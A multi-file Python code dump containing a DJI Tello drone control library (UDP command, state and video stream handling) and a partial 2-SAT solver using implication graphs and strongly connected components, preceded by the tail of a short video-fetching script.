for eid in eidList:
data = {"eid":eid,"count":30,"pcursor":"0"}
getVideo(data)
print("收工")
|
tello.py
|
"""Library for interacting with DJI Ryze Tello drones.
"""
# coding=utf-8
import logging
import socket
import time
from threading import Thread
from typing import Optional, Union, Type, Dict
from .enforce_types import enforce_types
import av
import numpy as np
threads_initialized = False
drones: Optional[dict] = {}
client_socket: socket.socket
class TelloException(Exception):
pass
@enforce_types
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
[1.3](https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf),
[2.0 with EDU-only commands](https://dl-cdn.ryzerobotics.com/downloads/Tello/Tello%20SDK%202.0%20User%20Guide.pdf)
"""
# Send and receive commands, client socket
RESPONSE_TIMEOUT = 7 # in seconds
TAKEOFF_TIMEOUT = 20 # in seconds
FRAME_GRAB_TIMEOUT = 5
TIME_BTW_COMMANDS = 0.1 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.001 # in seconds
RETRY_COUNT = 3 # number of retries after a failed command
TELLO_IP = '192.168.10.1' # Tello IP address
# Video stream, server socket
VS_UDP_IP = '0.0.0.0'
VS_UDP_PORT = 11111
CONTROL_UDP_PORT = 8889
STATE_UDP_PORT = 8890
# Constants for video settings
BITRATE_AUTO = 0
BITRATE_1MBPS = 1
BITRATE_2MBPS = 2
BITRATE_3MBPS = 3
BITRATE_4MBPS = 4
BITRATE_5MBPS = 5
RESOLUTION_480P = 'low'
RESOLUTION_720P = 'high'
FPS_5 = 'low'
FPS_15 = 'middle'
FPS_30 = 'high'
CAMERA_FORWARD = 0
CAMERA_DOWNWARD = 1
# Set up logger
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('[%(levelname)s] %(filename)s - %(lineno)d - %(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger('djitellopy')
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.INFO)
# Use Tello.LOGGER.setLevel(logging.<LEVEL>) in YOUR CODE
# to only receive logs of the desired level and higher
# Conversion functions for state protocol fields
INT_STATE_FIELDS = (
# Tello EDU with mission pads enabled only
'mid', 'x', 'y', 'z',
# 'mpry': (custom format 'x,y,z')
# Common entries
'pitch', 'roll', 'yaw',
'vgx', 'vgy', 'vgz',
'templ', 'temph',
'tof', 'h', 'bat', 'time'
)
FLOAT_STATE_FIELDS = ('baro', 'agx', 'agy', 'agz')
state_field_converters: Dict[str, Union[Type[int], Type[float]]]
state_field_converters = {key : int for key in INT_STATE_FIELDS}
state_field_converters.update({key : float for key in FLOAT_STATE_FIELDS})
# VideoCapture object
background_frame_read: Optional['BackgroundFrameRead'] = None
stream_on = False
is_flying = False
def __init__(self,
host=TELLO_IP,
retry_count=RETRY_COUNT):
global threads_initialized, client_socket, drones
self.address = (host, Tello.CONTROL_UDP_PORT)
self.stream_on = False
self.retry_count = retry_count
self.last_received_command_timestamp = time.time()
self.last_rc_control_timestamp = time.time()
if not threads_initialized:
# Run Tello command responses UDP receiver on background
client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
response_receiver_thread = Thread(target=Tello.udp_response_receiver)
response_receiver_thread.daemon = True
response_receiver_thread.start()
# Run state UDP receiver on background
state_receiver_thread = Thread(target=Tello.udp_state_receiver)
state_receiver_thread.daemon = True
state_receiver_thread.start()
threads_initialized = True
drones[host] = {'responses': [], 'state': {}}
self.LOGGER.info("Tello instance was initialized. Host: '{}'. Port: '{}'.".format(host, Tello.CONTROL_UDP_PORT))
def get_own_udp_object(self):
"""Get own object from the global drones dict. This object is filled
with responses and state information by the receiver threads.
Internal method, you normally wouldn't call this yourself.
"""
global drones
host = self.address[0]
return drones[host]
@staticmethod
def udp_response_receiver():
"""Setup drone UDP receiver. This method listens for responses of Tello.
Must be run from a background thread in order to not block the main thread.
Internal method, you normally wouldn't call this yourself.
"""
while True:
try:
data, address = client_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at client_socket'.format(address))
if address not in drones:
continue
drones[address]['responses'].append(data)
except Exception as e:
Tello.LOGGER.error(e)
break
@staticmethod
def udp_state_receiver():
"""Setup state UDP receiver. This method listens for state information from
Tello. Must be run from a background thread in order to not block
the main thread.
Internal method, you normally wouldn't call this yourself.
"""
state_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
state_socket.bind(("", Tello.STATE_UDP_PORT))
while True:
try:
data, address = state_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at state_socket'.format(address))
if address not in drones:
continue
data = data.decode('ASCII')
drones[address]['state'] = Tello.parse_state(data)
except Exception as e:
Tello.LOGGER.error(e)
break
@staticmethod
def parse_state(state: str) -> Dict[str, Union[int, float, str]]:
"""Parse a state line to a dictionary
Internal method, you normally wouldn't call this yourself.
"""
state = state.strip()
Tello.LOGGER.debug('Raw state data: {}'.format(state))
if state == 'ok':
return {}
state_dict = {}
for field in state.split(';'):
split = field.split(':')
if len(split) < 2:
continue
key = split[0]
value: Union[int, float, str] = split[1]
if key in Tello.state_field_converters:
num_type = Tello.state_field_converters[key]
try:
value = num_type(value)
except ValueError as e:
Tello.LOGGER.debug('Error parsing state value for {}: {} to {}'
.format(key, value, num_type))
Tello.LOGGER.error(e)
continue
state_dict[key] = value
return state_dict
def get_current_state(self) -> dict:
"""Call this function to attain the state of the Tello. Returns a dict
with all fields.
Internal method, you normally wouldn't call this yourself.
"""
return self.get_own_udp_object()['state']
def get_state_field(self, key: str):
"""Get a specific sate field by name.
Internal method, you normally wouldn't call this yourself.
"""
state = self.get_current_state()
if key in state:
return state[key]
else:
raise TelloException('Could not get state property: {}'.format(key))
def get_mission_pad_id(self) -> int:
"""Mission pad ID of the currently detected mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: -1 if none is detected, else 1-8
"""
return self.get_state_field('mid')
def get_mission_pad_distance_x(self) -> int:
"""X distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('x')
def get_mission_pad_distance_y(self) -> int:
"""Y distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('y')
def get_mission_pad_distance_z(self) -> int:
"""Z distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('z')
def get_pitch(self) -> int:
"""Get pitch in degree
Returns:
int: pitch in degree
"""
return self.get_state_field('pitch')
def get_roll(self) -> int:
"""Get roll in degree
Returns:
int: roll in degree
"""
return self.get_state_field('roll')
def get_yaw(self) -> int:
"""Get yaw in degree
Returns:
int: yaw in degree
"""
return self.get_state_field('yaw')
def get_speed_x(self) -> int:
"""X-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgx')
def get_speed_y(self) -> int:
"""Y-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgy')
def get_speed_z(self) -> int:
"""Z-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgz')
def get_acceleration_x(self) -> float:
"""X-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agx')
def get_acceleration_y(self) -> float:
"""Y-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agy')
def get_acceleration_z(self) -> float:
"""Z-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agz')
def get_lowest_temperature(self) -> int:
"""Get lowest temperature
Returns:
int: lowest temperature (°C)
"""
return self.get_state_field('templ')
def get_highest_temperature(self) -> int:
"""Get highest temperature
Returns:
float: highest temperature (°C)
"""
return self.get_state_field('temph')
def get_temperature(self) -> float:
"""Get average temperature
Returns:
float: average temperature (°C)
"""
templ = self.get_lowest_temperature()
temph = self.get_highest_temperature()
return (templ + temph) / 2
def get_height(self) -> int:
"""Get current height in cm
Returns:
int: height in cm
"""
return self.get_state_field('h')
def get_distance_tof(self) -> int:
"""Get current distance value from TOF in cm
Returns:
int: TOF distance in cm
"""
return self.get_state_field('tof')
def get_barometer(self) -> int:
"""Get current barometer measurement in cm
This resembles the absolute height.
See https://en.wikipedia.org/wiki/Altimeter
Returns:
int: barometer measurement in cm
"""
return self.get_state_field('baro') * 100
def get_flight_time(self) -> int:
"""Get the time the motors have been active in seconds
Returns:
int: flight time in s
"""
return self.get_state_field('time')
def get_battery(self) -> int:
"""Get current battery percentage
Returns:
int: 0-100
"""
return self.get_state_field('bat')
def get_udp_video_address(self) -> str:
"""Internal method, you normally wouldn't call this youself.
"""
address_schema = 'udp://{ip}:{port}' # + '?overrun_nonfatal=1&fifo_size=5000'
address = address_schema.format(ip=self.VS_UDP_IP, port=self.VS_UDP_PORT)
return address
def get_frame_read(self) -> 'BackgroundFrameRead':
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
address = self.get_udp_video_address()
self.background_frame_read = BackgroundFrameRead(self, address)
self.background_frame_read.start()
return self.background_frame_read
def send_command_with_return(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> str:
"""Send command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
Return:
bool/str: str with response text on success, False when unsuccessfull.
"""
# Commands very consecutive makes the drone not respond to them.
# So wait at least self.TIME_BTW_COMMANDS seconds
diff = time.time() - self.last_received_command_timestamp
if diff < self.TIME_BTW_COMMANDS:
self.LOGGER.debug('Waiting {} seconds to execute command: {}...'.format(diff, command))
time.sleep(diff)
self.LOGGER.info("Send command: '{}'".format(command))
timestamp = time.time()
client_socket.sendto(command.encode('utf-8'), self.address)
responses = self.get_own_udp_object()['responses']
while not responses:
if time.time() - timestamp > timeout:
message = "Aborting command '{}'. Did not receive a response after {} seconds".format(command, timeout)
self.LOGGER.warning(message)
return message
time.sleep(0.1) # Sleep during send command
self.last_received_command_timestamp = time.time()
first_response = responses.pop(0) # first datum from socket
try:
response = first_response.decode("utf-8")
except UnicodeDecodeError as e:
self.LOGGER.error(e)
return "response decode error"
response = response.rstrip("\r\n")
self.LOGGER.info("Response {}: '{}'".format(command, response))
return response
def send_command_without_return(self, command: str):
"""Send command to Tello without expecting a response.
Internal method, you normally wouldn't call this yourself.
"""
# Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds
self.LOGGER.info("Send command (no response expected): '{}'".format(command))
client_socket.sendto(command.encode('utf-8'), self.address)
def send_control_command(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> bool:
"""Send control command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = "max retries exceeded"
for i in range(0, self.retry_count):
response = self.send_command_with_return(command, timeout=timeout)
if 'ok' in response.lower():
return True
self.LOGGER.debug("Command attempt #{} failed for command: '{}'".format(i, command))
self.raise_result_error(command, response)
return False # never reached
def send_read_command(self, command: str) -> str:
"""Send given command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_command_with_return(command)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
if any(word in response for word in ('error', 'ERROR', 'False')):
self.raise_result_error(command, response)
return "Error: this code should never be reached"
return response
def send_read_command_int(self, command: str) -> int:
"""Send given command to Tello and wait for its response.
Parses the response to an integer
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return int(response)
def send_read_command_float(self, command: str) -> float:
"""Send given command to Tello and wait for its response.
Parses the response to an integer
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return float(response)
def raise_result_error(self, command: str, response: str) -> bool:
"""Used to reaise an error after an unsuccessful command
Internal method, you normally wouldn't call this yourself.
"""
tries = 1 + self.retry_count
raise TelloException("Command '{}' was unsuccessful for {} tries. Latest response:\t'{}'"
.format(command, tries, response))
def connect(self, wait_for_state=True):
"""Enter SDK mode. Call this before any of the control functions.
"""
self.send_control_command("command")
if wait_for_state:
REPS = 20
for i in range(REPS):
if self.get_current_state():
t = i / REPS # in seconds
Tello.LOGGER.debug("'.connect()' received first state packet after {} seconds".format(t))
break
time.sleep(1 / REPS)
if not self.get_current_state():
raise TelloException('Did not receive a state packet from the Tello')
def send_keepalive(self):
"""Send a keepalive packet to prevent the drone from landing after 15s
"""
self.send_control_command("keepalive")
def turn_motor_on(self):
"""Turn on motors without flying (mainly for cooling)
"""
self.send_control_command("motoron")
def turn_motor_off(self):
"""Turns off the motor cooling mode
"""
self.send_control_command("motoroff")
def initiate_throw_takeoff(self):
"""Allows you to take off by throwing your drone within 5 seconds of this command
"""
self.send_control_command("throwfly")
self.is_flying = True
def takeoff(self):
"""Automatic takeoff.
"""
# Something it takes a looooot of time to take off and return a succesful takeoff.
# So we better wait. Otherwise, it would give us an error on the following calls.
self.send_control_command("takeoff", timeout=Tello.TAKEOFF_TIMEOUT)
self.is_flying = True
def land(self):
"""Automatic landing.
"""
self.send_control_command("land")
self.is_flying = False
def streamon(self):
"""Turn on video streaming. Use `tello.get_frame_read` afterwards.
Video Streaming is supported on all tellos when in AP mode (i.e.
when your computer is connected to Tello-XXXXXX WiFi ntwork).
Currently Tello EDUs do not support video streaming while connected
to a WiFi-network.
!!! Note:
If the response is 'Unknown command' you have to update the Tello
firmware. This can be done using the official Tello app.
"""
self.send_control_command("streamon")
self.stream_on = True
def streamoff(self):
"""Turn off video streaming.
"""
self.send_control_command("streamoff")
self.stream_on = False
def emergency(self):
"""Stop all motors immediately.
"""
self.send_command_without_return("emergency")
self.is_flying = False
def move(self, direction: str, x: int):
"""Tello fly up, down, left, right, forward or back with distance x cm.
Users would normally call one of the move_x functions instead.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
"""
self.send_control_command("{} {}".format(direction, x))
def move_up(self, x: int):
"""Fly x cm up.
Arguments:
x: 20-500
"""
self.move("up", x)
def move_down(self, x: int):
"""Fly x cm down.
Arguments:
x: 20-500
"""
self.move("down", x)
def move_left(self, x: int):
"""Fly x cm left.
Arguments:
x: 20-500
"""
self.move("left", x)
def move_right(self, x: int):
"""Fly x cm right.
Arguments:
x: 20-500
"""
self.move("right", x)
def move_forward(self, x: int):
"""Fly x cm forward.
Arguments:
x: 20-500
"""
self.move("forward", x)
def move_back(self, x: int):
"""Fly x cm backwards.
Arguments:
x: 20-500
"""
self.move("back", x)
def rotate_clockwise(self, x: int):
"""Rotate x degree clockwise.
Arguments:
x: 1-360
"""
self.send_control_command("cw {}".format(x))
def rotate_counter_clockwise(self, x: int):
"""Rotate x degree counter-clockwise.
Arguments:
x: 1-3600
"""
self.send_control_command("ccw {}".format(x))
def flip(self, direction: str):
"""Do a flip maneuver.
Users would normally call one of the flip_x functions instead.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
"""
self.send_control_command("flip {}".format(direction))
def flip_left(self):
"""Flip to the left.
"""
self.flip("l")
def flip_right(self):
"""Flip to the right.
"""
self.flip("r")
def flip_forward(self):
"""Flip forward.
"""
self.flip("f")
def flip_back(self):
"""Flip backwards.
"""
self.flip("b")
def go_xyz_speed(self, x: int, y: int, z: int, speed: int):
"""Fly to x y z relative to the current position.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
"""
cmd = 'go {} {} {} {}'.format(x, y, z, speed)
self.send_control_command(cmd)
def curve_xyz_speed(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the current position
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
x2: -500-500
y1: -500-500
y2: -500-500
z1: -500-500
z2: -500-500
speed: 10-60
"""
cmd = 'curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed)
self.send_control_command(cmd)
def go_xyz_speed_mid(self, x: int, y: int, z: int, speed: int, mid: int):
"""Fly to x y z relative to the mission pad with id mid.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
mid: 1-8
"""
cmd = 'go {} {} {} {} m{}'.format(x, y, z, speed, mid)
self.send_control_command(cmd)
def curve_xyz_speed_mid(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int, mid: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the mission pad with id mid.
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
y1: -500-500
z1: -500-500
x2: -500-500
y2: -500-500
z2: -500-500
speed: 10-60
mid: 1-8
"""
cmd = 'curve {} {} {} {} {} {} {} m{}'.format(x1, y1, z1, x2, y2, z2, speed, mid)
self.send_control_command(cmd)
def go_xyz_speed_yaw_mid(self, x: int, y: int, z: int, speed: int, yaw: int, mid1: int, mid2: int):
"""Fly to x y z relative to mid1.
Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
yaw: -360-360
mid1: 1-8
mid2: 1-8
"""
cmd = 'jump {} {} {} {} {} m{} m{}'.format(x, y, z, speed, yaw, mid1, mid2)
self.send_control_command(cmd)
def enable_mission_pads(self):
"""Enable mission pad detection
"""
self.send_control_command("mon")
def disable_mission_pads(self):
"""Disable mission pad detection
"""
self.send_control_command("moff")
def set_mission_pad_detection_direction(self, x):
"""Set mission pad detection direction. enable_mission_pads needs to be
called first. When detecting both directions detecting frequency is 10Hz,
otherwise the detection frequency is 20Hz.
Arguments:
x: 0 downwards only, 1 forwards only, 2 both directions
"""
self.send_control_command("mdirection {}".format(x))
def set_speed(self, x: int):
"""Set speed to x cm/s.
Arguments:
x: 10-100
"""
self.send_control_command("speed {}".format(x))
def send_rc_control(self, left_right_velocity: int, forward_backward_velocity: int, up_down_velocity: int,
yaw_velocity: int):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
"""
def clamp100(x: int) -> int:
return max(-100, min(100, x))
if time.time() - self.last_rc_control_timestamp > self.TIME_BTW_RC_CONTROL_COMMANDS:
self.last_rc_control_timestamp = time.time()
cmd = 'rc {} {} {} {}'.format(
clamp100(left_right_velocity),
clamp100(forward_backward_velocity),
clamp100(up_down_velocity),
clamp100(yaw_velocity)
)
self.send_command_without_return(cmd)
def set_wifi_credentials(self, ssid: str, password: str):
"""Set the Wi-Fi SSID and password. The Tello will reboot afterwords.
"""
cmd = 'wifi {} {}'.format(ssid, password)
self.send_control_command(cmd)
def connect_to_wifi(self, ssid: str, password: str):
"""Connects to the Wi-Fi with SSID and password.
After this command the tello will reboot.
Only works with Tello EDUs.
"""
cmd = 'ap {} {}'.format(ssid, password)
self.send_control_command(cmd)
def set_network_ports(self, state_packet_port: int, video_stream_port: int):
"""Sets the ports for state packets and video streaming
While you can use this command to reconfigure the Tello this library currently does not support
non-default ports (TODO!)
"""
cmd = 'port {} {}'.format(state_packet_port, video_stream_port)
self.send_control_command(cmd)
def reboot(self):
"""Reboots the drone
"""
self.send_command_without_return('reboot')
def set_video_bitrate(self, bitrate: int):
"""Sets the bitrate of the video stream
Use one of the following for the bitrate argument:
Tello.BITRATE_AUTO
Tello.BITRATE_1MBPS
Tello.BITRATE_2MBPS
Tello.BITRATE_3MBPS
Tello.BITRATE_4MBPS
Tello.BITRATE_5MBPS
"""
cmd = 'setbitrate {}'.format(bitrate)
self.send_control_command(cmd)
def set_video_resolution(self, resolution: str):
"""Sets the resolution of the video stream
Use one of the following for the resolution argument:
Tello.RESOLUTION_480P
Tello.RESOLUTION_720P
"""
cmd = 'setresolution {}'.format(resolution)
self.send_control_command(cmd)
def set_video_fps(self, fps: str):
"""Sets the frames per second of the video stream
Use one of the following for the fps argument:
Tello.FPS_5
Tello.FPS_15
Tello.FPS_30
"""
cmd = 'setfps {}'.format(fps)
self.send_control_command(cmd)
def set_video_direction(self, direction: int):
"""Selects one of the two cameras for video streaming
The forward camera is the regular 1080x720 color camera
The downward camera is a grey-only 320x240 IR-sensitive camera
Use one of the following for the direction argument:
Tello.CAMERA_FORWARD
Tello.CAMERA_DOWNWARD
"""
cmd = 'downvision {}'.format(direction)
self.send_control_command(cmd)
def send_expansion_command(self, expansion_cmd: str):
"""Sends a command to the ESP32 expansion board connected to a Tello Talent
Use e.g. tello.send_expansion_command("led 255 0 0") to turn the top led red.
"""
cmd = 'EXT {}'.format(expansion_cmd)
self.send_control_command(cmd)
def query_speed(self) -> int:
"""Query speed setting (cm/s)
Returns:
int: 1-100
"""
return self.send_read_command_int('speed?')
def query_battery(self) -> int:
"""Get current battery percentage via a query command
Using get_battery is usually faster
Returns:
int: 0-100 in %
"""
return self.send_read_command_int('battery?')
def query_flight_time(self) -> int:
"""Query current fly time (s).
Using get_flight_time is usually faster.
Returns:
int: Seconds elapsed during flight.
"""
return self.send_read_command_int('time?')
def query_height(self) -> int:
"""Get height in cm via a query command.
Using get_height is usually faster
Returns:
int: 0-3000
"""
return self.send_read_command_int('height?')
def query_temperature(self) -> int:
"""Query temperature (°C).
Using get_temperature is usually faster.
Returns:
int: 0-90
"""
return self.send_read_command_int('temp?')
def query_attitude(self) -> dict:
"""Query IMU attitude data.
Using get_pitch, get_roll and get_yaw is usually faster.
Returns:
{'pitch': int, 'roll': int, 'yaw': int}
"""
response = self.send_read_command('attitude?')
return Tello.parse_state(response)
def query_barometer(self) -> int:
"""Get barometer value (cm)
Using get_barometer is usually faster.
Returns:
int: 0-100
"""
baro = self.send_read_command_int('baro?')
return baro * 100
def query_distance_tof(self) -> float:
"""Get distance value from TOF (cm)
Using get_distance_tof is usually faster.
Returns:
float: 30-1000
"""
# example response: 801mm
tof = self.send_read_command('tof?')
return int(tof[:-2]) / 10
def query_wifi_signal_noise_ratio(self) -> str:
"""Get Wi-Fi SNR
Returns:
str: snr
"""
return self.send_read_command('wifi?')
def query_sdk_version(self) -> str:
"""Get SDK Version
Returns:
str: SDK Version
"""
return self.send_read_command('sdk?')
def query_serial_number(self) -> str:
"""Get Serial Number
Returns:
str: Serial Number
"""
return self.send_read_command('sn?')
def query_active(self) -> str:
"""Get the active status
Returns:
str
"""
return self.send_read_command('active?')
def end(self):
"""Call this method when you want to end the tello object
"""
try:
if self.is_flying:
self.land()
if self.stream_on:
self.streamoff()
except TelloException:
pass
if self.background_frame_read is not None:
self.background_frame_read.stop()
host = self.address[0]
if host in drones:
del drones[host]
def __del__(self):
self.end()
class BackgroundFrameRead:
"""
This class read frames using PyAV in background. Use
backgroundFrameRead.frame to get the current frame.
"""
def __init__(self, tello, address):
self.address = address
self.frame = np.zeros([300, 400, 3], dtype=np.uint8)
# Try grabbing frame with PyAV
# According to issue #90 the decoder might need some time
# https://github.com/damiafuentes/DJITelloPy/issues/90#issuecomment-855458905
try:
Tello.LOGGER.debug('trying to grab video frames...')
self.container = av.open(self.address, timeout=(Tello.FRAME_GRAB_TIMEOUT, None))
except av.error.ExitError:
raise TelloException('Failed to grab video frames from video stream')
self.stopped = False
self.worker = Thread(target=self.update_frame, args=(), daemon=True)
def start(self):
"""Start the frame update worker
Internal method, you normally wouldn't call this yourself.
"""
self.worker.start()
def update_frame(self):
"""Thread worker function to retrieve frames using PyAV
Internal method, you normally wouldn't call this yourself.
"""
try:
for frame in self.container.decode(video=0):
self.frame = np.array(frame.to_image())
if self.stopped:
self.container.close()
break
except av.error.ExitError:
raise TelloException('Do not have enough frames for decoding, please try again or increase video fps before get_frame_read()')
def stop(self):
"""Stop the frame update worker
Internal method, you normally wouldn't call this yourself.
"""
self.stopped = True
|
circuit_design.py
|
# python3
# n, m = map(int, input().split())
# clauses = [ list(map(int, input().split())) for i in range(m) ]
# # This solution tries all possible 2^n variable assignments.
# # It is too slow to pass the problem.
# # Implement a more efficient algorithm here.
# def isSatisfiable():
# for mask in range(1<<n):
# result = [ (mask >> i) & 1 for i in range(n) ]
# formulaIsSatisfied = True
# for clause in clauses:
# clauseIsSatisfied = False
# if result[abs(clause[0]) - 1] == (clause[0] < 0):
# clauseIsSatisfied = True
# if result[abs(clause[1]) - 1] == (clause[1] < 0):
# clauseIsSatisfied = True
# if not clauseIsSatisfied:
# formulaIsSatisfied = False
# break
# if formulaIsSatisfied:
# return result
# return None
# result = isSatisfiable()
# if result is None:
# print("UNSATISFIABLE")
# else:
# print("SATISFIABLE");
# print(" ".join(str(-i-1 if result[i] else i+1) for i in range(n)))
import sys
import threading
import collections.abc
sys.setrecursionlimit(10**6) # max depth of recursion
threading.stack_size(2**26) # new thread will get stack of such size
import itertools
def conn_comp(edges):
vertices = set(v for v in itertools.chain(*edges))
indices = dict((v, -1) for v in vertices)
lowlinks = indices.copy()
ccs = []
index = 0
stack = []
for v in vertices:
if indices[v] < 0:
strong_connect(v, edges, indices, lowlinks, ccs, index, stack)
return ccs
def strong_connect(vertex, edges, indices, lowlinks, ccs, index, stack):
indices[vertex] = index
lowlinks[vertex] = index
index += 1
stack.append(vertex)
for v, w in [e for e in edges if e[0] == vertex]:
if indices[w] < 0:
strong_connect(w, edges, indices, lowlinks, ccs, index, stack)
lowlinks[v] = min(lowlinks[v], lowlinks[w])
elif w in stack:
lowlinks[v] = min(lowlinks[v], indices[w])
if indices[vertex] == lowlinks[vertex]:
ccs.append([])
while stack[-1] != vertex:
ccs[-1].append(stack.pop())
ccs[-1].append(stack.pop())
class Ordered_Set(collections.MutableSet):
def __init__(self, iterable=None):
self.end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.map = {} # key --> [key, prev, next]
if iterable is not None:
self |= iterable
def __len__(self):
return len(self.map)
def __contains__(self, key):
return key in self.map
def add(self, key):
if key not in self.map:
end = self.end
current = end[1]
current[2] = end[1] = self.map[key] = [key, current, end]
def discard(self, key):
if key in self.map:
key, prev, next = self.map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.end
current = end[2]
while current is not end:
yield current[0]
current = current[2]
def __reversed__(self):
end = self.end
current = end[1]
while current is not end:
yield current[0]
current = current[1]
def pop(self, last=True):
if not self:
raise KeyError('set is empty')
key = self.end[1][0] if last else self.end[2][0]
self.discard(key)
return key
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, list(self))
def __eq__(self, other):
if isinstance(other, Ordered_Set):
return len(self) == len(other) and list(self) == list(other)
return set(self) == set(other)
def post_orders(adjacents):
vertices = set([node for node in range(len(adjacents))])
def dfs(node, order, traversed):
que = collections.deque([node])
while len(que) > 0:
node = que.pop()
traversed.add(node)
moving_up = True
to_add = []
for adj in adjacents[node]:
if adj in traversed:
continue
moving_up = False
to_add.append(adj)
if moving_up:
order.add(node)
if node in vertices:
vertices.remove(node)
else:
que.append(node)
for n in to_add:
que.append(n)
post_order = Ordered_Set([])
traversed = set([])
vertices = set([node for node in range(len(adjacents))])
while True:
dfs(vertices.pop(), post_order, traversed)
if len(post_order) == len(adjacents):
break
assert len(post_order) == len(adjacents)
return list(post_order)
def post_orders_ss(adjacents):
def dfs(node, order, traversed):
traversed.add(node)
for adj in adjacents[node]:
if adj in traversed:
continue
dfs(adj, order, traversed)
if node in vertices:
vertices.remove(node)
order.add(node)
post_order = Ordered_Set([])
traversed = set([])
vertices = set([node for node in range(len(adjacents))])
while True:
dfs(vertices.pop(), post_order, traversed)
if len(post_order) == len(adjacents):
break
assert len(post_order) == len(adjacents)
return list(post_order)
def connected_component_(adjacents, node, found):
connected = set([])
def dfs(node, connected):
connected.add(node)
found.add(node)
found.add(node)
for adj in adjacents[node]:
if adj in found or adj in connected:
continue
dfs(adj, connected)
dfs(node, connected)
return connected
def connected_component(adjacents, node, found):
connected = set([])
que = collections.deque([node])
while len(que) > 0:
node = que.pop()
if node in connected:
continue
connected.add(node)
found.add(node)
for adj in adjacents[node]:
if adj in found or adj in connected:
continue
que.append(adj)
return connected
def analyse_connected_components_(n, adjacents, reverse, var_map):
order = post_orders_ss(reverse)
order_pointer = len(order) - 1
found = set([])
ccs = []
while order_pointer >= 0:
if order[order_pointer] in found:
order_pointer -= 1
continue
ccs.append(connected_component_(adjacents, order[order_pointer], found))
assert len(found) == len(adjacents), 'found {0} nodes, but {1} were specified'.format(len(found), n)
return ccs
def analyse_connected_components(n, adjacents, reverse):
order = post_orders_ss(reverse)
order_pointer = len(order) - 1
found = set([])
ccs = []
while order_pointer >= 0:
if order[order_pointer] in found:
order_pointer -= 1
continue
ccs.append(connected_component(adjacents, order[order_pointer], found))
assert len(found) == len(adjacents), 'found {0} nodes, but {1} were specified'.format(len(found), n)
return ccs
def build_implication_graph(n, clauses):
edges = []
var_dict = {}
node_dict = {}
node_num = 0
adjacents = [[] for _ in range(2*n)]
reversed_adjs = [[] for _ in range(2*n)]
for clause in clauses:
#if len(clause) == 1:
# assert False, 'should be two terms in the clause'
left = clause[0]
right = clause[1]
for term in [left, right]:
if not term in node_dict:
var_dict[node_num] = term
node_dict[term] = node_num
node_num += 1
if not -term in node_dict:
var_dict[node_num] = -term
node_dict[-term] = node_num
node_num += 1
adjacents[node_dict[-left]].append(node_dict[right])
reversed_adjs[node_dict[right]].append(node_dict[-left])
adjacents[node_dict[-right]].append(node_dict[left])
reversed_adjs[node_dict[left]].append(node_dict[-right])
